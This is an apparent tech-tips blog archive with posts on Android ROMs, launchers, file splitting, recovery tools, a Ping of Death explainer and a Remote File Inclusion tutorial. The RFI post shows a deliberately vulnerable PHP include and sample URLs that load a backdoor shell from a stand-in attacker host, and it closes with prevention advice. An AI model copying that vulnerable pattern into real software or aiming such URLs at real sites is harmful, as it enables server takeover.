Thursday, 19 June 2014

44) Get Free 100mb 2G/3G Internet Data From Officailly Tata Docomo

This is not trick,this is a free giveway by tata docomo  for all Tata Docomo Customers numbers and to test the Tata Docomo Internet Service

Tata Docomo is one of the top telecom providers in India, but its network was overloaded,slow and every 40-50 min disconnected in the past causing constant disconnection from Internet. 
However, the latest news from Tata Docomo has improved its network infrastructure and the network’s capacity is increasing.


Free 100MB Data from Tata Docomo for 5 Days to Test the Network

When this Telecom Company improving his Data Internet Service, Tata Docomo is inviting the users to try its improved service and in the bid to attract customers, they are offering a free trail pack of 100 MB which can be used for 5 days. The pack is free, but can be activated only once on a Tata Docomo number.You can't use it twice on single number.


To Activate free Tata Docomo Internet 100mb pack for 5 Days


To activate, open tatadocomo.com/reload.aspx in your web browser and enter your 10-digit Tata Docomo mobile number. 

Then follow the instructions.


  • New Stretch Packs – Cheap and Long Duration Internet Packs
  • Power Packs 


Click any of it and now you get your free 100mb pack recharge in your phone number.


Friday, 30 May 2014

43) Install KitKat 4.4 on Android

Hello Everyone, in this article i’m talking about how to install kitkat 4.4 on android devices with
CyanogenMod 11CyanogenMod is an open source operating system for smartphones and tablet computers, based on the Android mobile platform. It is developed as free and open source software based on the official releases of Android by Google, with added original and third-party code. CyanogenMod releases are provided on a nightly, milestone, and “stable version” schedule. I’ve been running CM 11(kitkat 4.4) for a couple of months now and have been very impressed. Now, you can get the same KitKat (CM 11) experience on the aging but still wonderful . Here’s how to do it.

Install KitKat 4.4 on Android:

Install KitKat 4.4 on Android Install KitKat 4.4 on Android

Warning:

The installation of custom ROMs is risky, so if you do not follow the procedure properly, you can end up with an unusable phone. Back up all your data first, charge your battery and proceed with caution. Neither “HelperTricks Team” nor myself will be held responsible for any damage done to your phone as a result of this process.
Must Check : Top Best Keyboard Apps For Android


Requirements:


  • Rooted Android Phone (If you’re not rooted and are unsure how to root your android, check these root tutorial.)
  • Nandroid backup of your system
  • You should also backup your app data too as this process will wipe your device.

Downloads:

Download the latest CM 11 for your Android Device form Official Site of CyanogenMod. As always, there’s nothing preventing you from flashing a newer version, once it is available.
Also download the Google applications package for KitKat: gapps-kk

Install KitKat 4.4 on Android with CM 11:


CM 11 Homescreen Install KitKat 4.4 on Android


Since your device is rooted, we will use the good old custom recovery method. As a reminder, here is the procedure:
1. Download both zip files given above on your android device.
2. Place both files in the root directory of your android device.
3. Turn off the android device and restart in Recovery Mode (for samsung-> Home + Power + Volume Up until the logo appears or the third vibration and release & for other android devices-> use google to find how to open recovery mod or clockworkmod for any android device).
4. Perform a factory reset by selecting and confirming the option “Wipe Data/Factory Reset” then “Wipe Cache“. Some users prefer to ”Format System” / ”Wipe Dalvik Cache” at this point too.
5. Then select “install zip from sd card” and locate the CM 11 zip you downloaded before.
6. Click “Yes” to confirm.
7. Next, flash the gapps zip file.
8. Return to the main Recovery Menu and select “Reboot System Now“.
The first reboot on CM 11 may take a few minutes. Let us know how you like it!
If you face any problem feel free discuss in below comments,

42) How To Install iOS On Android

1. Espier Launcher 7

Espier Launcher 7 is the flat-style edition of the best and the most popular Apple style home screen app for Android devices. In this edition, you can experience the perfect Android implementation of Apple’s flat style font, layout, search page, and animations. Now, you can feel the simplicity on your Android devices.
espier launcher 7 How To Install iOS On Android
Features From Play Store :

  •  Flat-style.
  •  Dozens switches or options, which help the launcher matches your Android device perfectly.
  •  Unique multi-language support; Dozens languages supported, and more and more.
  •  Design icon by yourself.
  •  Dozens of themes.

2. iOS 7 Lockscreen Parallax HD

The is simple lock screen of iOS 7 can be had on your Android with this app, you get the flat style lock screen with the parallax effect to boot, the camera launcher, sliding to unlock and passcode. This locker updated with the latest lock screen security. This app will lock your screen with two different layers of securities.
iOS 7 Lockscreen Parallax HD How To Install iOS On Android

3. Espier Notifications 7

Espier Notifications 7 is a flat style personalized status bar, notification page, and notification management plugin for Espier Launcher 7. Espier Notifications 7 can help you to manage the notifications sent by apps to the status bar or the notification page. It can make your status bar and notification page clear and uniform, and enhance the visual effects of your Android device’s notification display.
espier notification 7 How To Install iOS On Android
Features From Play Store :

  • The clear status bar and the notification page in flat style.
  • Three tabs in the notification page: Tody, All, and Unread.
  • Merge multiple notifications of an application into one intelligently.
  • Use Notification Center to effectively manage which notifications can be displayed and how.
  • Several customization options.

4. Control Center 7

Espier Control Center 7 is a plugin for Espier Launcher 7 (or Espier Launcher). This app can help you to rapidly control the system functions such as Airplane Mode, WiFi, Wireless, Bluetooth, and so on. It can also help you to quick launch some tool apps, such as flashlight, clock, calculator, and camera.
Espier Control Center 7 How To Install iOS On Android
Features From Play Store :

  •  The control center in Apple’s flat style.
  • Rapidly control system functions, such as Airplane Mode, WiFi, Wireless, Bluetooth, and so on.
  • Quick launch the frequently used apps, such as flashlight, clock, calculator and camera.
  • Control music player and sound volume by setting a 4×1 or 5×1 widget.
  • Several customization options.

5. Espier Dialer 7

Espier Dialer 7 is the best dialer and contacts app for Android phone in Apple’s flat style. This app allows you to experience the contacts management and the call management in Apple’s flat style on your Android mobile phone.
espier dialer 7 How To Install iOS On Android

Features From Play Store :


  • Apple’s flat style user interfaces, simple and practical.
  • Favorites management helps you to manage your frequent contacts.
  • Easily manage the call log ordered by all and missed.
  • Alphabetical list of contacts helps you locate your contact easily.
  • Dial Pad provides support for T9 intelligent matching

6.  Other Apps

  • Boot Animation                            [ Download ]
  • Currency Converter App              [ Download ]
  • iLauncher                                     [ Download ]
  • iNoty                                           [ Download ]
  • iOS 7 Browser                             [ Download ]
  • iOS 7 Calculator                          [ Download ]
  • iOS7 Memo                                 [ Download ]
  • iOS Gallery                                  [ Download ]
  • A.I.type Keyboard                       [ Download ]
  • iOS 7 Music                                 [ Download ]

NOTE : First of all download and install very thing on your android mobile. Then click your Home Button A little Pop-up will come which will show which launcher. Select  Espier Launcher 7 and select Always.
So, by using above apps you can transform your android into iOS 7 running device. I hope this helped you a lot. If you are facing any problem just comment it below. Feel free to share. Thanks !!

Tuesday, 17 December 2013

41) Testing Remote File Inclusion vulnerability in web applications

Remote file inclusion(RFI) is a critical vulnerability caused by insufficient validation of user input passed to the web application.  The RFI vulnerability allows attackers to load remotely hosted malicious file such as a backdoor shell.


Vulnerable Code
Let us say a webpage called "RFI.php" that loads a code from external file using 'filename' parameter.
 

In the above screenshot, the RFI.php file loads the code from 'news.php'.

HTTP request:
http://site/RFI.php?filename=news.php

Let us check the PHP code of RFI.php :
code(RFI.php):

   <?php
        include($_GET['filename']);
   ?>
The include() function gets the all code/text from the specified file(news.php) and copies it into the current file(rfi.php).

Content of news.php file

As you can see the developer didn't validate the 'filename' and passed it directly to the 'include' function.  It results in Remote File inclusion vulnerability. 


Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "http://www.google.com" as filename parameter to the webpage.

HTTP request:
http://site/RFI.php?filename=http://www.google.com


Hurrah, it successfully loaded the content from the Google.com :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
A hacker with malicious intent can load a backdoor shell.  The backdoor shell allows the hacker to compromise the entire web server.

For Example:
http://site/RFI.php?filename=http://attacker/shell.txt



Using this shell, now an attacker is able to do anything in the server.  For instance, he can delete index.php file.

Example 2:

In most of the web applications, the filename is passed as parameter without the extension(.php).

For example:
http://site/RFI.php?filename=news


------------------------
Code of RFI.php:
------------------------
<?php
        include($_GET['filename'].".php");
 ?>
As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.   

So, if we pass "shell.txt", then the filename will become "shell.txt.php", results in an error.



To avoid this error, you can use Null Byte.  Null byte() indicates the end of the string. The strings following the null byte will be ignored.

We can enter the null byte at the end of our filename to ignore the ".php" string.

http://site/RFI.php?filename=http://attacker/shell.txt

---------
If You would like to test how a remote file inclusion attack works, you can just download our Vulnerable app "BTS Pentesting Lab" from here:
http://code.google.com/p/bts-pentesting-lab/

In case, you would like to see the real world examples, Here is list of Vulnerability reports:
Exploit-Db

 How to Prevent Remote File Inclusion vulnerability
  • Disable the 'register_globals' and 'allow_url_fopen' and 'allow_url_include' in PHP.ini file.  In latest version of PHP, they have been turned off :) so no need to worry now.
  •  Validate Users' Input.

Monday, 16 December 2013

40) Transfer data over 100GB from one place to another via email Using Split Tool

Transfer data over 100GB from one place to another via email, pendrive, ­other storage device. If you want to transfer a file from
one place to another, but don’t have enough space, in your pen drive or any other external device or you want to send large data via email, it is better to split the file into pieces and transfer the small files one by one and merge them later.
HJSplit
is the best freeware tool available to Windows users for this purpose. It supports file sizes of over 100 GB. In addition to that, this software doesn’t require any installation to use. Just download the zip file, extract the HJSplit.exe on your computer and doubleclick to run it. Here’s how you can split and then rejoin those pieces and
end up with a fully functional file.
Spliting a file
 
1. Double click on the HJSplit.exe file to run it. Now click on the Split
button.
 
2. click on the Input File button to choose the file you want to split.
 
3. Click on the Output button to choose the location for the output
files.
 
4. Then click on Start button to start the process.
 
NOTE:: The process of splitting the file will start. A progress bar will appear to show the status. The time
it takes will depend on the size of the file you are splitting.
Merge files
1. Run the tool again

39) Free Data Recovery Tools

1. Recuva

It is a free data recovery software from piriform, the same team that gave us ccleaner and defragler.

It is simple and easy to use.

Capable of recovering files deleted from recycle bins, memory cards and other portable device.

It also has a deep scan mode where your chances of getting the data back is even better.

Regarding compatibility, it runs good upto windows 7 32-bit. Haven’t tested it with windows 8 yet.

It is also available as a portable version i.e you can run it directly from the downloaded file which is definitely an advantage!

2. Pandora Recovery


It is also capable of recovering permanently deleted files from your hard drives.

Has a preview mode where you can view the recoverable images and texts from your harddrives.

There is an option called as surface scan where you can search for files from a corrupted or reformatted partitions.

There is also a helpful wizard which can guide you through the recovery processes.

It is compatible up to windows 7

3. Tokiwa Data Recovery

It Is the most easy to use data recovery tool currently available.

It has a simple interface with a few but powerful options.

A scan button to scan for recoverable files.

You can also search for a specific file by typing the file name in the search box.

There is also a wipe button which can permanently delete the recoverable files from any partition except the drive where your OS is installed.

4. Free UnDelete

It is just another simple tool for data recovery.

Supports various file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32.

Available both in portable as well as installer versions.

5. Avira UnErase Personal

Avira UnErase personal is a bit older than the other tools listed here but still works good.

It supports file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32 like others.

It also supports dynamic disks, software and hardware RAID, volume sets and stripe sets which is useful for advanced users.

The interface is less graphical and consumes less memory which is definitely good for low configuration systems.

It is also available as portable version.

Sunday, 15 December 2013

38) Ping of Death


Ping of Death

The ping of death attack is one of the oldest network attacks. The principle of ping of death simply involves creating an IP datagram whose total size exceeds the maximum authorized size (65,536 bytes).

When such a packet is sent to a system with a vulnerable TCP/IP stack, it will cause the system to crash.
The Ping of Death attack relied on a bug in the Berkeley TCP/IP stack which also existed on most systems which copied the Berkeley network code. The ping of death was simply sending ping packets.

The maximum allowable IP packet size is 65,535 bytes, including the packet header, which is typically 20 bytes long. An ICMP echo request is an IP packet with a pseudo header, which is 8 bytes long. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 - 20 - 8 = 65,507).

However, many ping implementations allow the user to specify a packet size larger than 65,507 bytes. A grossly oversized ICMP packet can trigger a range of adverse system reactions such as denial of service (DoS), crashing, freezing, and rebooting.

The ping of death attack, or PoD, can cripple a network based on a flaw in the TCP/IP system. Since the maximum size for a packet is 65,535 bytes. If one were to send a packet larger than that, the receiving computer would ultimately crash from confusion.

Sending a ping of this size is against the rules of the TCP/IP protocol, but hackers can bypass this by cleverly sending the packets in fragments. When the fragments are assembled on the receiving computer, the overall packet size is too great. This will cause a buffer overflow and crash the device.